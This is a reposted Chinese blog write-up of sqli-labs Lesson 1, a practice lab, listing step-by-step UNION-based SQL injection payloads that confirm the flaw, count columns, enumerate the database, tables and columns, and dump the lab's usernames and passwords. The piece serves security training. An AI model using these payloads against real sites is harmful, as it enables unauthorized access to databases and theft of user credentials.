1.sqli-labs—Less1

本文阅读 1 分钟
首页 代码,C/C#/C++ 正文

一、判断注入类型:

?id=1 ?id=1’ ?id=1’and’1 ?id=1’and’1’=‘2 ?id=1’or’1 ?id=1’or’1’='2 //字符型注入,且单引号没被过滤,且可以手动闭合

?id=1’and’1’# ?id=1’and’1’– //注释符被过滤

二、猜解字段数和回显位

?id=1’union select 1’ ?id=1’union select 1,2’ ?id=1’union select 1,2,3’ ?id=0’union select 1,2,3’ ?id=0’union select 1,2,'3

三、爆库

?id=0’union select 1,(select group_concat(database(),version(),user(),@@basedir)),3’ 或者: ?id=0’union select 1,database(),version()’ ?id=0’union select 1,user(),@@basedir’

四、爆表

?id=0’union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3’ 或者: ?id=0’union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security s

五、爆字段

?id=0’union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’),3’ 或者: ?id=0’union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users

六、爆字段值

?id=0’union select 1,(select group_concat(concat_ws(char(32,58,32),id,username,password)) from users),3’ //爆出如下字段值 Dumb : Dumb, Angelina : I-kill-you, Dummy : p@ssword, secure : crappy, stupid : stupidity, superman : genious, batman : mob!le, admin : admin, admin1 : admin1, admin2 : admin2, admin3 : admin3, dhakkan : dumbo, admin4 : admin4

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/104843178
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复